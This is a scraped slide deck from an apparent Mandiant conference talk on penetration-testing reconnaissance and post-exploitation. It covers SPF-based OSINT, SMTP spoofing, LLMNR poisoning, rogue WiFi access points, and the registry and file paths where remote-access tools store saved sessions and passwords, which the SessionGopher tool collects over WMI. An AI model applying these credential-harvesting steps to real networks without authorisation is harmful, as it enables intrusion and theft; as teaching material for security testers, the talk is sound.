SlideShare a Scribd company logo
Copyright © FireEye, Inc. All rights reserved.1
Brandon Arvanaghi
@arvanaghi
Breadcrumbs to LoavesHow Tidbits of Information Lead Us to Full-Scale Compromise
Copyright © FireEye, Inc. All rights reserved.2
Brandon Arvanaghi (@arvanaghi)
• Security Consultant at Mandiant
• Webshell detection, post-exploitation, sandbox detection tools
• Researched automated attack plan generation at Vanderbilt University
Copyright © FireEye, Inc. All rights reserved.3
Breadcrumbs
• Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation
• Types of breadcrumbs:
• Open Source Intelligence Gathering (OSINT)/External
• Wireless
• Internal (physical connection connection)
• Post-exploitation – Bulk of Talk
• SessionGopher – tool I developed to discover Unix systems and jump boxes
https://github.com/fireeye/SessionGopher
Copyright © FireEye, Inc. All rights reserved.4
OSINT/EXTERNAL
BREADCRUMBS
Copyright © FireEye, Inc. All rights reserved.5
Crumb #1: SPF Records
• Sender Policy Framework
• You own example.com
• Problem: Spoofing emails from @example.com is easily done by creating a mail server and modifying
headers
• Solution: SPF record at example.com’s DNS zone. Says “you should only see emails from
@example.com from the following IP addresses: ….”
• Recipients now automatically check with example.com’s DNS servers if email’s source IP is in SPF record
Copyright © FireEye, Inc. All rights reserved.6
Crumb #1: SPF Records
• As an attacker, SPF records provide insight into third parties
• Sometimes, companies want third parties to be able to send mail on their behalf
• E.g. example of LinkedIn trusting DocuSign to send emails from
https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-
records
• https://hackertarget.com/quietly-mapping-the-network-attack-surface/
Copyright © FireEye, Inc. All rights reserved.7
Crumb #2: Subsidiaries
• Company only as strong as its weakest link
• Mergers and Acquisitions
• Due diligence
• Cyber insurance
Copyright © FireEye, Inc. All rights reserved.8
Crumb #3: Unauthenticated SMTP Server
• If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that
server to internal employees
• Without authentication, you can spoof any internal email address!
http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-
commands-via-gmail
Copyright © FireEye, Inc. All rights reserved.12
INTERNAL
BREADCRUMBS
Copyright © FireEye, Inc. All rights reserved.13
Crumb #1: LLMNR
• LLMNR = Link-Local Multicast Name Resolution
• Hosts on the same link (subnet) can resolve DNS queries, as opposed to just relying on DNS server
• Peer-to-peer, decentralized
• Fast
• Multicast
• Implicitly trust everyone
• Responder by SpiderLabs
Unicast Example
I’m a PC
DNSStandard DNS query
Unicast Example
DNS
10.0.30.15
Standard DNS query
10.0.30.15
Great! I’m coming
to:
I’m a PC
Unicast Example
DNS
10.0.30.15
Standard DNS query
10.0.30.15
✅I’m a PC
Multicast Example
LLMNR
Hi everyone! Where’s
confluence.corp.com?
That’s me! 10.1.40.15, come over!
10.1.40.15
I’m a PC
Multicast Example
LLMNR
10.1.40.15
I’m a PC
10.1.40.15
Great! I’m coming
to:
Multicast Example
LLMNR
10.1.40.15
I’m a PC
10.1.40.15
Copyright © FireEye, Inc. All rights reserved.20
Crumb #2: IT HelpDesk/Intranet
• Company helpdesk sites often lack authentication
• Real examples from engagements:
• “Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3”
• Excel file storing Unix system passwords
Copyright © FireEye, Inc. All rights reserved.21
Crumb #2: IT HelpDesk/Intranet
1. Nmap scan across subnets
2. Run EyeWitness by Christopher Truncer
Copyright © FireEye, Inc. All rights reserved.22
Crumb #3: Anonymous Shares
• Publically available shared folders that do not require any form of authentication
• Often out of perceived necessity
• Contractors, vendors
• Result: plaintext password files
Copyright © FireEye, Inc. All rights reserved.23
Crumb #4: When Hostnames Make Sense
• Use PowerView or ADExplorer to get lists of hostnames
• Nonintrusive way to understand the role of each system without doing Nmap scans
• SQLWIN7.CORP.COM
• MAIL01.CORP.COM
• MEDIA-BKUP.CORP.COM
Copyright © FireEye, Inc. All rights reserved.24
WIRELESS BREADCRUMBS
Copyright © FireEye, Inc. All rights reserved.25
Crumb #1: Guest Network Host Visibility
• Guest networks should be segregated. This is not always done properly.
• Visible hosts with visible services can lead to lateral movement onto corporate network
• Pivot!
Copyright © FireEye, Inc. All rights reserved.26
Crumb #2: Remembered Networks
• Your device probes for every single access point it remembers having associated
• Yells out known SSID names indiscriminately
• WiFi Pineapple responds any probe, automatically connecting you
• Direct your traffic to internet while reading all unencrypted traffic
• Quietly changing HTTPS requests to HTTP
Copyright © FireEye, Inc. All rights reserved.27
Remembered Networks: Real Mandiant Engagement
Copyright © FireEye, Inc. All rights reserved.28
Remembered Networks: Real Mandiant Engagement
Copyright © FireEye, Inc. All rights reserved.29
Remembered Networks: Real Mandiant Engagement
associated!
Copyright © FireEye, Inc. All rights reserved.30
Remembered Networks: Real Mandiant Engagement
associated!
Visible to two different networks
PsExec, WMIExec, etc.
31
Copyright © FireEye, Inc. All rights reserved.32
POST-EXPLOITATION
SessionGopher: Finding Unix Systems and Jump Boxes
https://github.com/fireeye/SessionGopher
Copyright © FireEye, Inc. All rights reserved.33
The Registry
• On many engagements, consultants are tasked with exploiting Unix systems
• Intellectual property on Macbook Pros
• Point of sale terminals running Linux
• Etc.
• Often not domain-joined!
• Would be so much easier if they were
• Use PowerView
• How can we find & exploit them?
Copyright © FireEye, Inc. All rights reserved.34
The Registry
• Current methodology
1. Nmap for live hosts not found in Active Directory
a. Open Unix ports
2. netstat domain-joined systems, look for active connections over Unix ports
3. Search Active Directory for groups like “Linux Admins” & “Mac Admins”
a. Find their members’ workstations, active sessions
• Methodology relies on luck and active sessions. Better way?
Copyright © FireEye, Inc. All rights reserved.35
The Registry
• HKEY_USERS
• Persistent storage of saved session for any user who has logged in!
• Users don’t have to be currently logged in
• Though Unix systems not domain-joined,
they are often managed by domain-joined
Windows systems
• Valuable artifacts on these hosts
• Solves our “active session” problem
• But what can we find in this magical hive
that helps us exploit Unix systems?
Copyright © FireEye, Inc. All rights reserved.36
The Registry
Copyright © FireEye, Inc. All rights reserved.37
Solution
1. Find artifacts left by tools typically used to access Unix systems.
2. If they exist, then saved sessions might exist. Extract ’em.
Copyright © FireEye, Inc. All rights reserved.38
Tools
• WinSCP
• FileZilla
• PuTTY
• SuperPuTTY
• VNC
• RDP
• More!
Copyright © FireEye, Inc. All rights reserved.39
Paths to Sessions
Stored in Registry
• PuTTY
• HKEY_USERS<SID>SOFTWARESimonTathamPuTTYSessions
• WinSCP
• HKEY_USERS<SID>SOFTWAREMartin PrikrylWinSCP 2Sessions
• Microsoft Remote Desktop
• HKEY_USERS<SID> SOFTWAREMicrosoftTerminal Server ClientServers
Non-registry (assumes filename/location unchanged)
• FileZilla
• <Drive>:Users<Username>AppDataRoamingFileZillasitemanager.xml
• SuperPuTTY
• <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml
Copyright © FireEye, Inc. All rights reserved.40
WinSCP
HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2Sessions<SessionName>
HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2ConfigurationSecurity
Copyright © FireEye, Inc. All rights reserved.41
Copyright © FireEye, Inc. All rights reserved.42
WinSCP
Copyright © FireEye, Inc. All rights reserved.43
Paths to Sessions
• HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault
• HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault
Copyright © FireEye, Inc. All rights reserved.44
FileZilla
<Drive>:Users<Username>AppDataRoamingFileZillaSiteManager.xml
Copyright © FireEye, Inc. All rights reserved.45
SuperPuTTY
<Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml
• ExtraArgs field can contain plaintext password
Copyright © FireEye, Inc. All rights reserved.46
PuTTY .ppk Files
• One-click PuTTY logins
• Key can be plaintext (as in here)
or encrypted
Copyright © FireEye, Inc. All rights reserved.47
Microsoft .rdp Files
• Executable, can be read by dragging
into text editor
• Plethora of arguments, many optional
• Host, if admin, prompt for credentials, etc.
• Fieldname:TypeOfField:Value
• TypeOfField = Integer or String
Copyright © FireEye, Inc. All rights reserved.48
Copyright © FireEye, Inc. All rights reserved.49
Copyright © FireEye, Inc. All rights reserved.50
Windows Management Instrumentation (WMI)
• Rather than running SessionGopher on each computer (impractical), we can use WMI
• Built-in “Invoke-WmiMethod” command in PowerShell
• Remote registry querying ability
Copyright © FireEye, Inc. All rights reserved.51
Copyright © FireEye, Inc. All rights reserved.52
Write to CSV (Invoke-SessionGopher –o)
• Create a physical mapping of the network
• Aggregate all session data across entire domain or targeted computers
• Essentially, see the physical infrastructure of network!
Copyright © FireEye, Inc. All rights reserved.53
QUESTIONS?
Twitter: @arvanaghi
Github: https://github.com/fireeye/SessionGopher
Brandon Arvanaghi

More Related Content

What's hot

Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
Andrew McNicol
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
grecsl
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Chris Gates
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
snyff
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
Mike Felch
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Priyanka Aash
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Priyanka Aash
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
Mike Felch
 
1000 to 0
1000 to 01000 to 0
1000 to 0
Sunny Neo
 

What's hot (20)

Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at Notacon on April 12, 2014
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 

Similar to Breadcrumbs to Loaves: BSides Austin '17

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test   compromising a highly secure environment (nikhil)Ultimate pen test   compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)
ClubHack
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
eightbit
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
MuhammadRehan856177
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
dnomura
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
Beau Bullock
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
UC San Diego
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
PaloAltoNetworks
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud Security
SBWebinars
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the Cloud
Teri Radichel
 
Creating a fortress in your active directory environment
Creating a fortress in your active directory environmentCreating a fortress in your active directory environment
Creating a fortress in your active directory environment
David Rowe
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber Attacks
Security Bootcamp
 
What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?
Precisely
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptxDafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
AlfredObia1
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
Vincent Giersch
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 

Similar to Breadcrumbs to Loaves: BSides Austin '17 (20)

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test   compromising a highly secure environment (nikhil)Ultimate pen test   compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
 
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
Pro Tips for Power Users – Palo Alto Networks Live Community and Fuel User Gr...
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud Security
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the Cloud
 
Creating a fortress in your active directory environment
Creating a fortress in your active directory environmentCreating a fortress in your active directory environment
Creating a fortress in your active directory environment
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber Attacks
 
What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?What Does a Full Featured Security Strategy Look Like?
What Does a Full Featured Security Strategy Look Like?
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptxDafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 

Recently uploaded

Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Zilliz
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
TIPNGVN2
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
Rohit Gautam
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
Zilliz
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Vladimir Iglovikov, Ph.D.
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Speck&Tech
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
Pixlogix Infotech
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 

Recently uploaded (20)

Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
